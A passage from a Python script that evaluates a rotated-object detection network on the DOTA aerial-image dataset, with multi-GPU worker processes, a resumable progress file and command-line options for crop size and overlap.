        start = i * nr_image
        end = min(start + nr_image, nr_records)
        split_records = real_test_img_list[start:end]
        proc = Process(target=worker, args=(int(gpu_id), split_records, det_net, args, result_queue))
        print('process:%d, start:%d, end:%d' % (i, start, end))
        proc.start()
        procs.append(proc)
    # Exactly one result per image arrives on the queue.
    for _ in range(nr_records):
        res = result_queue.get()
        if args.show_box:
            _draw_detections(res, save_path)
        else:
            _write_detections(res, save_path, txt_name)
        pbar.set_description("Test image %s" % res['image_id'].split('/')[-1])
        pbar.update(1)
    for p in procs:
        p.join()
def eval(num_imgs, args):
    """Evaluate up to `num_imgs` images from args.test_dir on DOTA.

    In text-output mode (the default) a progress file named after
    cfgs.VERSION tracks which images were already tested, so an interrupted
    run resumes where it left off; the file is removed after a complete run.
    In --show_box mode every image is (re)visualized and no progress file
    filtering is applied.

    NOTE(review): the function name shadows the builtin `eval`; it is kept
    unchanged because the __main__ block calls it by this name.

    :param num_imgs: number of images to evaluate, or np.inf for all.
    :param args: parsed CLI namespace.
    """
    txt_name = '{}.txt'.format(cfgs.VERSION)
    if not args.show_box:
        # Ensure the progress file exists, then read the already-tested list.
        if not os.path.exists(txt_name):
            with open(txt_name, 'w'):
                pass
        with open(txt_name, 'r') as fr:
            img_filter = fr.readlines()
        print('****************************'*3)
        print('Already tested imgs:', img_filter)
        print('****************************'*3)
        # Progress-file lines end in '\n', hence the suffix in the membership test.
        test_imgname_list = [os.path.join(args.test_dir, img_name) for img_name in os.listdir(args.test_dir)
                             if img_name.endswith(('.jpg', '.png', '.jpeg', '.tif', '.tiff')) and
                             (img_name + '\n' not in img_filter)]
    else:
        test_imgname_list = [os.path.join(args.test_dir, img_name) for img_name in os.listdir(args.test_dir)
                             if img_name.endswith(('.jpg', '.png', '.jpeg', '.tif', '.tiff'))]
    assert len(test_imgname_list) != 0, 'test_dir has no imgs there.' \
                                        ' Note that, we only support img format of (.jpg, .png, and .tiff) '
    if num_imgs == np.inf:
        real_test_img_list = test_imgname_list
    else:
        real_test_img_list = test_imgname_list[: num_imgs]
    fpn = build_whole_network.DetectionNetwork(
        base_network_name=cfgs.NET_NAME,
        is_training=False)
    test_dota(det_net=fpn, real_test_img_list=real_test_img_list, args=args, txt_name=txt_name)
    if not args.show_box:
        # Every image was processed -- discard the resume/progress file.
        os.remove(txt_name)
def parse_args():
    """Build and run the command-line parser for DOTA evaluation.

    Returns the parsed argparse.Namespace holding the test directory, GPU
    list, crop-window geometry, evaluation count and display flag.
    """
    parser = argparse.ArgumentParser('evaluate the result.')
    parser.add_argument('--test_dir', dest='test_dir', type=str,
                        default='/data/dataset/DOTA/test/images/',
                        help='evaluate imgs dir ')
    parser.add_argument('--gpus', dest='gpus', type=str,
                        default='0,1,2,3,4,5,6,7',
                        help='gpu id')
    parser.add_argument('--eval_num', dest='eval_num', type=int,
                        default=np.inf,
                        help='the num of eval imgs')
    parser.add_argument('--show_box', '-s', action='store_true',
                        default=False)
    parser.add_argument('--h_len', dest='h_len', type=int,
                        default=800, help='image height')
    parser.add_argument('--w_len', dest='w_len', type=int,
                        default=800, help='image width')
    parser.add_argument('--h_overlap', dest='h_overlap', type=int,
                        default=200, help='height overlap')
    parser.add_argument('--w_overlap', dest='w_overlap', type=int,
                        default=200, help='width overlap')
    return parser.parse_args()
if __name__ == '__main__':
    # Script entry point: parse options, echo them, run the evaluation.
    args = parse_args()
    divider = 20 * "--"
    print(divider)
    print(args)
    print(divider)
    eval(args.eval_num, args=args)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.